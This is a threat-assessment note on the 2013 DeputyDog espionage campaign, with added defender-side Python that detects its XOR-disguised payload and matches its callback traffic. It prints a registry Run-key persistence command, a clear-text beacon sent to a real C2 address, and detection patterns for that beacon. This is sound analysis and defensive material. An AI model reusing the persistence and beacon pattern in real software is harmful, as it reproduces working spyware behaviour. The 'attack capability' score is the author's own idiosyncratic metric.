DeputyDog APT: Attack Campaign Assessment - By nEINEI  Time: 2013-09-21

1) DeputyDog (also known as APT17) is more likely an attack campaign orchestrated by the Hidden Lynx group.
2) It was a targeted attack campaign against Japan.

Symptoms

FireEye detected the payload used in these attacks on August 23, 2013 in Japan. The payload was hosted on a server in Hong Kong (210.176.3.130) and was named “img20130823.jpg”. Although it had a .jpg file extension, it was not an image file. The file, when XORed with 0x95, was an executable (MD5: 8aba4b5184072f2a50cbc5ecfe326701).

Upon execution, 8aba4b5184072f2a50cbc5ecfe326701 writes “28542CC0.dll” (MD5: 46fd936bada07819f61ec3790cb08e19) to this location:

    C:\Documents and Settings\All Users\Application Data\28542CC0.dll

In order to maintain persistence, the original malware adds this registry key:

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\28542CC0

The registry key has this value:

    rundll32.exe "C:\Documents and Settings\All Users\Application Data\28542CC0.dll",Launch

The malware (8aba4b5184072f2a50cbc5ecfe326701) then connects to a host in South Korea (180.150.228.102). This callback traffic is HTTP over port 443 (which is typically used for HTTPS encrypted traffic; however, the traffic is not HTTPS nor SSL encrypted). Instead, this clear-text callback traffic resembles this pattern:

    POST /info.asp HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Agtid: [8 chars]08x
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
    Host: 180.150.228.102:443
    Content-Length: 1045
    Connection: Keep-Alive
    Cache-Control: no-cache

    [8 chars]08x&[Base64 Content]

The unique HTTP header “Agtid:” contains 8 characters followed by “08x”. The same pattern can be seen in the POST content as well.
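As an added example (not part of the original note and not FireEye's code), the following Python helpers turn the indicators above into two defender-side triage checks: whether a suspect file becomes a PE image when XORed with 0x95, which is how the disguised “img20130823.jpg” carried its executable, and whether a captured clear-text HTTP request has the documented Agtid/08x callback shape with the same 8-character tag in both header and body. The sample request is constructed; the tag ABCD1234 and the base64 body are made-up values, while the IP, path, header names and hashes are the ones quoted above.

```python
import re

# Indicators quoted from the write-up above
XOR_KEY = 0x95
C2_HOST = "180.150.228.102"
KNOWN_MD5 = {
    "8aba4b5184072f2a50cbc5ecfe326701",  # decoded payload
    "46fd936bada07819f61ec3790cb08e19",  # dropped 28542CC0.dll
}


def xor_bytes(data, key=XOR_KEY):
    """XOR every byte with a single-byte key; the payload was disguised this way."""
    return bytes(b ^ key for b in data)


def looks_like_xored_pe(data, key=XOR_KEY):
    """True if XORing the first two bytes with `key` reveals the 'MZ' DOS header.

    A real JPEG starts with FF D8, which does not decode to 'MZ' under 0x95,
    so this is a cheap first-pass check for the "image that is really a PE" trick.
    """
    return len(data) >= 2 and xor_bytes(data[:2], key) == b"MZ"


# Callback shape: header "Agtid: <8 chars>08x" and body "<8 chars>08x&<base64>"
AGTID_HEADER_RE = re.compile(r"^Agtid:[ \t]*(\S{8})08x[ \t]*\r?$", re.MULTILINE)
AGTID_BODY_RE = re.compile(r"^(\S{8})08x&([A-Za-z0-9+/=]+)[ \t]*\r?$", re.MULTILINE)
HOST_RE = re.compile(r"^Host:[ \t]*([^\s:]+)(?::(\d+))?[ \t]*\r?$", re.MULTILINE)


def match_deputydog_callback(request):
    """Return a dict describing the match, or None if the request does not fit.

    `request` is the raw clear-text HTTP request as a str. All three conditions
    must hold: a POST to /info.asp, an Agtid header of the documented shape, and
    a body whose 8-character tag equals the tag in the header.
    """
    parts = re.split(r"\r?\n\r?\n", request, maxsplit=1)
    head = parts[0]
    body = parts[1] if len(parts) == 2 else ""
    if not head.startswith("POST /info.asp "):
        return None
    hdr = AGTID_HEADER_RE.search(head)
    if hdr is None:
        return None
    bod = AGTID_BODY_RE.search(body)
    if bod is None or bod.group(1) != hdr.group(1):
        return None
    host = HOST_RE.search(head)
    return {
        "agent_tag": hdr.group(1),
        "host": host.group(1) if host else None,
        "port": int(host.group(2)) if host and host.group(2) else 80,
        "known_c2": bool(host) and host.group(1) == C2_HOST,
    }


# Constructed sample request in the documented shape (tag and body are made up)
SAMPLE_REQUEST = (
    "POST /info.asp HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Agtid: ABCD123408x\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)\r\n"
    "Host: 180.150.228.102:443\r\n"
    "Content-Length: 1045\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "ABCD123408x&QUJDRDEyMzQ=\r\n"
)


if __name__ == "__main__":
    # Constructed disguised file: a PE header XORed with 0x95
    disguised = xor_bytes(b"MZ\x90\x00\x03\x00")
    print("XOR-0x95 PE:", looks_like_xored_pe(disguised))
    print("callback match:", match_deputydog_callback(SAMPLE_REQUEST))
```

The match requires the tag in the body to equal the tag in the Agtid header, which is the part of the pattern a generic "POST on port 443 without TLS" rule cannot express; a port-443 flow that is not TLS is itself a useful anomaly, so the returned `port` and `known_c2` fields are there to feed that second rule.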
Related sample information:

    6fe1634dce1d095d6b8a06757b5b6041
    8aba4b5184072f2a50cbc5ecfe326701
    46fd936bada07819f61ec3790cb08e19

Minimal closed set of attack samples:

    Exploit file: the original file is missing; an exploit against the IE browser. Estimated size 100k.
    dropper: 4cca64709c3ab88dc4a68a419f5c5773588c67826b88fa6edf961f7b52a2622b, size = 26112

Attack capability calculation:

    k = 2 (within the normal range of security awareness)
    a = 3 (no user interaction required)
    s = 2 (spear phishing, watering hole attack or SQL injection; assessed as 2 here)
    m = 5 (code injection, specialized trojan, weapon set, very broad espionage functionality, infection of specific targets)
    p = 1 (attacks 1 platform)
    x = 5 (0-day vulnerability CVE-2013-3893)
    c = sample size term in KB, as computed below: dropper 26112/1024 plus the estimated 100 for the exploit file

Attack capability = (a+s+m+p)^k * (1+x)^2 + c

AT = (3 + 2 + 5 + 1)^2 * (1+5)^2 + 26112/1024 + 100
   = 11^2 * 6^2 + 126
   = 4356 + 126
   = 4482
   ==> 4482 * 1000 / 1279625 (1T attack-capability unit) = 3.502T

References:

1. https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html
2. "On the Nature of Advanced Threats and the Quantification of Attack Capability" (论高级威胁的本质及攻击能力的量化研究) - www.vxjump.net/files/aptr/aptr.txt
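As an added example (not from the note and not from the cited paper), a small Python implementation of the attack-capability formula above that reproduces the DeputyDog figures. The parameter names are the note's own; the rounding of c to a whole number of KB and the 1279625 normalisation constant follow the calculation shown above rather than any definition in the cited paper.

```python
T_UNIT = 1279625  # divisor used in the note: 1T attack-capability unit


def attack_capability(a, s, m, p, k, x, sample_sizes_kb):
    """AT = (a+s+m+p)^k * (1+x)^2 + c, with c the summed sample sizes in KB.

    The note rounds c to a whole number of KB (25.5 + 100 -> 126), so the
    same rounding is applied here to reproduce its figure exactly.
    """
    c = int(sum(sample_sizes_kb) + 0.5)
    return (a + s + m + p) ** k * (1 + x) ** 2 + c


def to_t_units(at):
    """Normalise a raw AT score to the note's 'T' unit (AT * 1000 / 1279625)."""
    return at * 1000 / T_UNIT


# DeputyDog parameters exactly as assessed in the note above
DEPUTYDOG = {"a": 3, "s": 2, "m": 5, "p": 1, "k": 2, "x": 5}
DEPUTYDOG_SAMPLES_KB = [26112 / 1024, 100]  # dropper in KB; exploit file estimated at 100k


def deputydog_score():
    """Return (AT, T) for DeputyDog: expected (4482, about 3.502)."""
    at = attack_capability(sample_sizes_kb=DEPUTYDOG_SAMPLES_KB, **DEPUTYDOG)
    return at, to_t_units(at)


if __name__ == "__main__":
    at, t = deputydog_score()
    print(f"AT = {at}, {t:.3f}T")
```

Keeping the size term separate from the weighted parameters makes the two sensitivities visible: the exploit class x enters squared, so moving from a known bug to a 0-day dominates the score, while c only shifts it by the sample size in KB.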